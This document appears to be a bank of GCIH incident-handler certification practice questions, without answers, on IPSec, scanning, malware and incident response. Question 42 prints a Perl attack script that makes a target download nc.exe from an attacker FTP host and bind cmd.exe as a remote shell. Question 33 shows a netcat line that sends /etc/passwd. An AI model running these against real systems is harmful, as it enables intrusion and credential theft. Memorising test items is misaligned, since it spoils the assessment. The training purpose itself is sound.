

GCIH GIAC Certified Incident Handler Question and Answers

Question # 4

US Garments wants all data communication between its corporate office and a remote location to be encrypted.

They want to achieve the following results:

- Authentication of users
- Anti-replay
- Anti-spoofing
- IP packet encryption

They implemented IPSec using Authentication Headers (AHs). Which results does this solution provide?

Each correct answer represents a complete solution. Choose all that apply.

A. Anti-replay
B. IP packet encryption
C. Authentication of users
D. Anti-spoofing

Question # 5

Which of the following steps of incident response is steady in nature?

A. Containment
B. Eradication
C. Preparation
D. Recovery

Question # 6

You want to create an SSH tunnel for POP and SMTP protocols. Which of the following commands will you run?

A. ssh -L 110:mailhost:110 -L 25
B. ssh -L 110:mailhost:110 -L 25:mailhost:25 -1
C. ssh -L 25:mailhost:110 -L 110
D. ssh -L 110:mailhost:110 -L 25:mailhost:25 -l user -N mailhost

Question # 7

You are concerned about rootkits on your network communicating with attackers outside your network. Without using an IDS, how can you detect this sort of activity?

A. By examining your domain controller server logs.
B. You cannot, you need an IDS.
C. By examining your firewall logs.
D. By setting up a DMZ.

Question # 8

Which of the following IP packet elements is responsible for authentication while using IPSec?

A. Authentication Header (AH)
B. Layer 2 Tunneling Protocol (L2TP)
C. Internet Key Exchange (IKE)
D. Encapsulating Security Payload (ESP)

Question # 9

Which of the following types of attacks slows down or stops a server by overloading it with requests?

A. DoS attack
B. Impersonation attack
C. Network attack
D. Vulnerability attack

Question # 10

Which of the following HTTP requests is the SQL injection attack?

Question # 11

Fill in the blank with the appropriate name of the tool.

______ scans for rootkits by comparing SHA-1 hashes of important files with known good ones in an online database.

Question # 12

Windump is a Windows port of the famous TCPDump packet sniffer, which is available on a variety of platforms. In order to use this tool on the Windows platform, a user must install a packet capture library.

What is the name of this library?

A. PCAP
B. SysPCap
C. WinPCap
D. libpcap

Question # 13

Which of the following provides packet-level encryption between hosts in a LAN?

A. PPTP
B. IPsec
C. PFS
D. Tunneling protocol

Question # 14

Which of the following refers to a condition in which a hacker sends a bunch of packets that leave TCP ports half open?

A. Spoofing
B. Hacking
C. SYN attack
D. PING attack

Question # 15

Which of the following are based on malicious code?

Each correct answer represents a complete solution. Choose two.

A. Denial-of-Service (DoS)
B. Biometrics
C. Trojan horse
D. Worm

Question # 16

Which of the following statements is true about a Trojan engine?

A. It limits the system resource usage.
B. It specifies the signatures that keep a watch for a host or a network sending multiple packets to a single host or a single network.
C. It specifies events that occur in a related manner within a sliding time interval.
D. It analyzes the nonstandard protocols, such as TFN2K and BO2K.

Question # 17

Maria works as a professional Ethical Hacker. She has been assigned the project of testing the security of www.gentech.com. She is using dumpster diving to gather information about Gentech Inc.

Under which of the following steps of malicious hacking does dumpster diving fall?

A. Multi-factor authentication
B. Role-based access control
C. Mutual authentication
D. Reconnaissance

Question # 18

Which of the following penetration testing phases involves reconnaissance or data gathering?

A. Attack phase
B. Pre-attack phase
C. Post-attack phase
D. Out-attack phase

Question # 19

Which of the following functions in C/C++ can be the cause of a buffer overflow?

Each correct answer represents a complete solution. Choose two.

A. printf()
B. strcat()
C. strcpy()
D. strlength()

Question # 20

Which of the following nmap command parameters is used for TCP SYN port scanning?

A. -sF
B. -sU
C. -sX
D. -sS

Question # 21

You want to perform passive footprinting against the we-are-secure Inc. Web server. Which of the following tools will you use?

A. Nmap
B. Ethereal
C. Ettercap
D. Netcraft

Question # 22

Which of the following statements about the Ping of Death attack is true?

A. In this type of attack, a hacker sends more traffic to a network address than the buffer can handle.
B. This type of attack uses common words in either upper or lower case to find a password.
C. In this type of attack, a hacker maliciously cuts a network cable.
D. In this type of attack, a hacker sends ICMP packets greater than 65,536 bytes to crash a system.

Question # 23

Fill in the blank with the appropriate term.

______ is a free Unix subsystem that runs on top of Windows.

Question # 24

Which of the following systems is used in the United States to coordinate emergency preparedness and incident management among various federal, state, and local agencies?

A. US Incident Management System (USIMS)
B. National Disaster Management System (NDMS)
C. National Emergency Management System (NEMS)
D. National Incident Management System (NIMS)

Question # 25

You discover that your network routers are being flooded with broadcast packets that have the return address of one of the servers on your network. This is resulting in an overwhelming amount of traffic going back to that server and flooding it. What is this called?

A. Syn flood
B. Blue jacking
C. Smurf attack
D. IP spoofing

Question # 26

Which of the following tools is used to attack digital watermarking?

A. Active Attacks
B. 2Mosaic
C. Steg-Only Attack
D. Gifshuffle

Question # 27

John works as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. The company is aware of various types of security attacks and wants to impede them. Hence, management has assigned John a project to port scan the company's Web Server. For this, he uses the nmap port scanner and issues the following command to perform idle port scanning:

nmap -PN -p- -sI IP_Address_of_Company_Server

He analyzes that the server's TCP ports 21, 25, 80, and 111 are open.

Which of the following security policies is the company using during this entire process to mitigate the risk of hacking attacks?

A. Non-disclosure agreement
B. Antivirus policy
C. Acceptable use policy
D. Audit policy

Question # 28

Adam, a novice web user, is very conscious about security. He wants to visit a Web site that is known to have malicious applets and code. Adam always makes use of a basic Web browser to perform such testing.

Which of the following web browsers can adequately fill this purpose?

A. Mozilla Firefox
B. Internet Explorer
C. Lynx
D. Safari

Question # 29

You want to integrate the Nikto tool with the Nessus vulnerability scanner. Which of the following steps will you take to accomplish the task?

Each correct answer represents a complete solution. Choose two.

A. Place the nikto.pl file in the /etc/nessus directory.
B. Place the nikto.pl file in the /var/www directory.
C. Place the directory containing nikto.pl in root's PATH environment variable.
D. Restart the nessusd service.

Question # 30

Which of the following types of malware can an antivirus application disable and destroy?

Each correct answer represents a complete solution. Choose all that apply.

A. Rootkit
B. Trojan
C. Crimeware
D. Worm
E. Adware
F. Virus

Question # 31

Which of the following refers to applications or files that are not classified as viruses or Trojan horse programs, but can still negatively affect the performance of the computers on your network and introduce significant security risks to your organization?

A. Hardware
B. Grayware
C. Firmware
D. Melissa

Question # 32

Under which of the following malicious hacking steps does email tracking fall?

A. Reconnaissance
B. Gaining access
C. Maintaining Access
D. Scanning

Question # 33

Which of the following actions is performed by the netcat command given below?

nc 55555 < /etc/passwd

A. It changes the /etc/passwd file when connected to the UDP port 55555.
B. It resets the /etc/passwd file to the UDP port 55555.
C. It fills the incoming connections to /etc/passwd file.
D. It grabs the /etc/passwd file when connected to UDP port 55555.

Question # 34

Rick works as a Computer Forensic Investigator for BlueWells Inc. He has been informed that some confidential information is being leaked out by an employee of the company. Rick suspects that someone is sending the information through email. He checks the emails sent by some employees to other networks. Rick finds out that Sam, an employee of the Sales department, is continuously sending text files that contain special symbols, graphics, and signs. Rick suspects that Sam is using the Steganography technique to send data in a disguised form. Which of the following techniques is Sam using?

Each correct answer represents a part of the solution. Choose all that apply.

A. Linguistic steganography
B. Perceptual masking
C. Technical steganography
D. Text Semagrams

Question # 35

Fill in the blank with the appropriate word.

StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use ______ defense against buffer overflow attacks.

Question # 36

Adam works as an Incident Handler for Umbrella Inc. He has been sent to the California unit to train the members of the incident response team. As a demo project, he asked the members of the incident response team to perform the following actions:

- Remove the network cable wires.
- Isolate the system on a separate VLAN.
- Use a firewall or access lists to prevent communication into or out of the system.
- Change DNS entries to direct traffic away from the compromised system.

Which of the following steps of the incident handling process includes the above actions?

A. Identification
B. Containment
C. Eradication
D. Recovery

Question # 37

Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a variable than the variable was designed to hold.

Which of the following are the two popular types of buffer overflows?

Each correct answer represents a complete solution. Choose two.

A. Dynamic buffer overflows
B. Stack based buffer overflow
C. Heap based buffer overflow
D. Static buffer overflows

Question # 38

You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?

A. Manual penetration testing
B. Code review
C. Automated penetration testing
D. Vulnerability scanning

Question # 39

You run the following bash script in Linux:

for i in `cat hostlist.txt`; do
    nc -q 2 -v $i 80 < request.txt
done

Here, the hostlist.txt file contains the list of IP addresses and request.txt is the output file. Which of the following tasks do you want to perform by running this script?

A. You want to put nmap in the listen mode to the hosts given in the IP address list.
B. You want to perform banner grabbing to the hosts given in the IP address list.
C. You want to perform port scanning to the hosts given in the IP address list.
D. You want to transfer the file hostlist.txt to the hosts given in the IP address list.

Question # 40

Which of the following statements are true about worms?

Each correct answer represents a complete solution. Choose all that apply.

A. Worms cause harm to the network by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
B. Worms can exist inside files such as Word or Excel documents.
C. One feature of worms is keystroke logging.
D. Worms replicate themselves from one system to another without using a host file.

Question # 41

You work as a Penetration Tester for Infosec Inc. Your company takes on security auditing projects. Recently, your company has assigned you a project to test the security of the we-are-secure.com Web site. For this, you want to perform an idle scan so that you can find the open ports on the we-are-secure.com server. You are using the Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that the IPID is being incremented on every query, regardless of whether the ports are open or closed. Sometimes, the IPID is being incremented by more than one.

What may be the reason?

A. The firewall is blocking the scanning process.
B. The zombie computer is not connected to the we-are-secure.com Web server.
C. The zombie computer is interacting with some other system besides your computer.
D. Hping does not perform idle scanning.

Question # 42

Adam, a malicious hacker, performs an exploit, which is given below:

#####################################################
$port = 53;                   # Spawn cmd.exe on port X
$your = "192.168.1.1";        # Your FTP Server 89
$user = "Anonymous";          # login as
$pass = 'noone@nowhere.com';  # password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o=<STDIN>;
print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);

Which of the following is the expected result of the above exploit?

A. Creates a share called "sasfile" on the target system
B. Creates an FTP server with write permissions enabled
C. Opens up a SMTP server that requires no username or password
D. Opens up a telnet listener that requires no username or password

Question # 43

Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords?

A. Rainbow attack
B. Brute Force attack
C. Dictionary attack
D. Hybrid attack

Question # 44

In which of the following scanning methods do Windows operating systems send only RST packets irrespective of whether the port is open or closed?

A. TCP FIN
B. FTP bounce
C. XMAS
D. TCP SYN

Question # 45

Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to test the network security of the company. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a company's icon to mark the progress of the test. Adam successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access.

How was security compromised and how did the firewall respond?

A. The attack was social engineering and the firewall did not detect it.
B. Security was not compromised as the webpage was hosted internally.
C. The attack was Cross Site Scripting and the firewall blocked it.
D. Security was compromised as the keylogger is invisible to the firewall.

Question # 46

Adam, a malicious hacker, wants to perform a reliable scan against a remote target. He is not concerned about being stealthy at this point.

Which of the following types of scans would be most accurate and reliable?

A. UDP scan
B. TCP Connect scan
C. ACK scan
D. FIN scan

Question # 47

Which of the following tools can be used to perform a brute-force attack on a remote database?

Each correct answer represents a complete solution. Choose all that apply.

A. SQLBF
B. SQLDict
C. FindSA
D. nmap

Question # 48

You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows server 2003 and Windows active directory installation and placement. Which of the following steps are you using to perform hacking?

A. Scanning
B. Covering tracks
C. Reconnaissance
D. Gaining access

Question # 49

Adam works as a Network Administrator for PassGuide Inc. He wants to protect the network from DoS attacks. Which of the following is most useful against DoS attacks?

A. SPI
B. Distributive firewall
C. Honey Pot
D. Internet bot